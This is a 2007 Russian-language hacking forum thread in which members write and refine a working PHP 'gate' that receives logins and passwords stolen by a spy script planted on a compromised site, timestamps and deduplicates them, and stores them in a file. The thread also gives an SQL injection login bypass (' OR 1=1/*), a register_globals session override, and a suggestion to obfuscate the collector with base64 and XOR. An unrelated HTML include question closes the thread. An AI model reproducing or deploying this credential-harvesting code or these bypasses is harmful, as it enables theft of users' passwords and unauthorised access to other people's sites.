ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > ПРОГРАММИРОВАНИЕ > PHP
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 21.11.2007, 15:45
spyke
Познающий
Регистрация: 04.08.2005
Сообщений: 62
С нами: 10929474

Репутация: 46
По умолчанию

Ponchik, да ты бог) Все просто летает и лишь 1 строчка)
 
Ответить с цитированием

  #2  
Старый 21.11.2007, 16:06
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
С нами: 10892546

Репутация: 2274


По умолчанию

195531, покажи скрипт выше, надо знать что такое $innick и откуда оно берётся
А ваще логи и пасс напиши ' OR 1=1/* если пустит, значит можно, если нет, всётаки выложи скрипт
/me только что заметил "//вышестоящая проверка вырезана, поскольку там ничего не поделать"
ну значит не судьба
Хотя если включены глобальные переменные, можеш попробовать зайти на сайт
index.php?$_SESSION[userenter]=1

Последний раз редактировалось Ponchik; 21.11.2007 в 16:08..
 
Ответить с цитированием

  #3  
Старый 21.11.2007, 16:36
195531
Новичок
Регистрация: 19.11.2007
Сообщений: 3
С нами: 9724463

Репутация: 0
По умолчанию

Цитата:
Сообщение от Ponchik  
195531, покажи скрипт выше, надо знать что такое $innick и откуда оно берётся
А ваще логи и пасс напиши ' OR 1=1/* если пустит, значит можно, если нет, всётаки выложи скрипт
/me только что заметил "//вышестоящая проверка вырезана, поскольку там ничего не поделать"
ну значит не судьба
Хотя если включены глобальные переменные, можеш попробовать зайти на сайт
index.php?$_SESSION[userenter]=1
ссылку кинул в другой раздел, здесь все таки не совсем то. там инъекции нет походу, но можно весь код посмотреть, если интересно смотрите

http://forum.antichat.ru/showthread.php?p=510350#post510350
 
Ответить с цитированием

  #4  
Старый 21.11.2007, 17:07
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
С нами: 9999746

Репутация: 1318


По умолчанию

spyke, используй для вошки, которая льёт пасы в файло такой код:

PHP код:
<?php

if (isset($_GET["login"]) && isset($_GET["password"])) {
    
$line sprintf("%s:%s\n"$_GET["login"], $_GET["password"]);

    
$suff_data file("stuff.txt");

    foreach (
$suff_data as $account_data)
        if (
trim($line) == trim($account_data)) die("Повтор на первом игроке");

    
$file_id fopen("stuff.txt""a+");
    if (!
$file_id) die("Не могу открыть файлег!");

    
fputs($file_id$line);

    
fclose($file_id);
}

?>
Разумеется, исправь поведение на ошибки и следи чтобы файл не вырос до громадных размеров, иначе скрипт будет тормозить, а следовательно и будет тормозить страница, с которой ты вызываешь вошку.
 
Ответить с цитированием

  #5  
Старый 21.11.2007, 17:44
spyke
Познающий
Регистрация: 04.08.2005
Сообщений: 62
С нами: 10929474

Репутация: 46
По умолчанию

Скрипт рабочий, но допустим, мне нужно поставить дату и время перед каждой парой логин , пароль. Я сделал вот так:
PHP код:
<?PHP
$date 
date("m/d/y H:i:s");
if (isset(
$_GET["acc"]) && isset($_GET["pass"])) {
    
$line sprintf("$date [ %s , %s ]\n"$_GET["acc"], $_GET["pass"]);

    
$suff_data file("file.txt");

    foreach (
$suff_data as $account_data)
        if (
trim($line) == trim($account_data)) die("повтор");

    
$file_id fopen("file.txt""a+");
    if (!
$file_id) die("die");

    
fputs($file_id$line);

    
fclose($file_id);
}

?>
На выходе получаем это:

Код:
11/21/07 14:23:46 [ test , test ]
11/21/07 14:23:50 [ test , test ]
11/21/07 14:23:50 [ test , test ]
11/21/07 14:39:05 [ sdfsdf , sdfdsf ]
11/21/07 14:39:09 [ sdfsdf , sdfdsf ]
11/21/07 14:39:10 [ sdfsdf , sdfdsf ]
11/21/07 14:39:13 [ sdfsdf , sdfdsf ]
11/21/07 14:39:14 [ sdfsdf , sdfdsf ]
11/21/07 14:39:26 [ werwr , sdfsdsg ]
11/21/07 14:39:36 [ werwr , sdfsdsg ]
11/21/07 14:39:37 [ werwr , sdfsdsg ]
11/21/07 14:39:43 [ werwr , sdfsdsg ]
11/21/07 14:39:44 [ werwr , sdfsdsg ]
11/21/07 14:40:00 [ werwr , sdfsdsg ]
Скрипт смотрит строки, а мне нужно чтоб он смотрел в квадратные скобки каждой строчки) И еще, юзеры зачастую первый раз вводят пароль неправильно и посылают данные еще раз. Тоесть, автоматом надо отсеивать только повторяющиеся пары логин+пароль, а не просто логин.
Предлагаю мастерам написать гибкий скрипт универсального гейта) С гуи интерфейсом и всякими фичами. Хокер выбирает, какие переменные принимать, куда их сохранять, в каком формате, ставить ли дату и время, в каком опять же формате и где, включать ли защиту от повторов. Гуи должен в конце показать кусочек пхп кода file() , со всеми нужными переменными и адресом сервера.
Вроде, я такому еще аналогов не видел.

Да, кусочек кода может модифицироваться base64 по желанию, а инфа криптоваться XOR'ом.

Последний раз редактировалось spyke; 21.11.2007 в 17:54..
 
Ответить с цитированием

  #6  
Старый 21.11.2007, 17:58
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
С нами: 10892546

Репутация: 2274


По умолчанию

Пля! Ничо не понимал, дошло что это гейт
PHP код:
<?PHP 
$date 
date("m/d/y H:i:s"); 
if (isset(
$_GET["acc"]) && isset($_GET["pass"])) { 
    
$line sprintf("$date [ %s , %s ]\n"$_GET["acc"], $_GET["pass"]); 

    
$suff_data file_get_contents("file.txt"); 

    if (!
strpos($suff_data,"{$_GET['acc']} , {$_GET['pass']}")) {

       
$file_id fopen("file.txt""a+"); 
       if (!
$file_id) die("die"); 

       
fputs($file_id$line); 

       
fclose($file_id); 
   } 
//Иначе просто ничего не делать


?>
Если чё, стучи 202-995-022 буду тебя учить

Последний раз редактировалось Ponchik; 22.11.2007 в 12:02..
 
Ответить с цитированием

  #7  
Старый 21.11.2007, 18:33
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
С нами: 9999746

Репутация: 1318


По умолчанию

Ну чтобы писать с датой запроса, можно использовать такой скрипт:

PHP код:
<?php

if (isset($_GET["login"]) && isset($_GET["password"])) {
    
$line sprintf("%s:%s\n"$_GET["login"], $_GET["password"]);

    
$suff_data file("stuff.txt");

    foreach (
$suff_data as $account_data)
        if (
trim($line) == trim($account_data)) die("Повтор на первом игроке");

    
$file_id fopen("stuff.txt""a+");
    if (!
$file_id) die("Не могу открыть файлег!");

    
$extended_line sprintf("[%s] - %s"date("m/d/y H:i:s"), $line);
    
fputs($file_id$extended_line);

    
fclose($file_id);
}

?>
А чтобы писать только те пароли, которые были введены правильно - ты просто вставь на хосте, в которого ты засадил шпиона, строчку вызова вошки в то место, которое идёт после проверки аутентификации...
 
Ответить с цитированием

  #8  
Старый 21.11.2007, 18:37
spyke
Познающий
Регистрация: 04.08.2005
Сообщений: 62
С нами: 10929474

Репутация: 46
По умолчанию

Спасибо всем еще раз, проблема решена)
 
Ответить с цитированием

  #9  
Старый 22.11.2007, 08:53
XopoIII
Постоянный
Регистрация: 29.10.2007
Сообщений: 381
С нами: 9754684

Репутация: 65
По умолчанию

почему в браузере не высвечивается содержимое файлов(файлы не пустые...)

PHP код:
<HTML> 
<HEAD> 
<TITLE>Главная страница</TITLE> 
</HEAD> 
<table width=100% height=100% border=1>

<tr><td height=150 colspan=3>
<center>Заголовок</center>
</td></tr>

<tr><td width=150>
<?php 
include "left.php";
?>
</td>

<td>
TEXT
</td>

<td width=150>
<?php 
include "golos.html";
?>
</td></tr>

<tr><td height=15 colspan=3>
TEXT
</td></tr>
</table>
</HTML>

Последний раз редактировалось XopoIII; 22.11.2007 в 10:15..
 
Ответить с цитированием

  #10  
Старый 22.11.2007, 08:54
XopoIII
Постоянный
Регистрация: 29.10.2007
Сообщений: 381
С нами: 9754684

Репутация: 65
По умолчанию

часть таблицы где инклуды тупо проподает
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[c/c++] Новичкам: задаем вопросы _Great_ С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby 5421 21.04.2026 07:37
Интернетчики задали российскому президенту очень странные вопросы podkashey Мировые новости. Обсуждения. 4 07.07.2006 16:53
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 9 (пользователей: 0 , гостей: 9)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.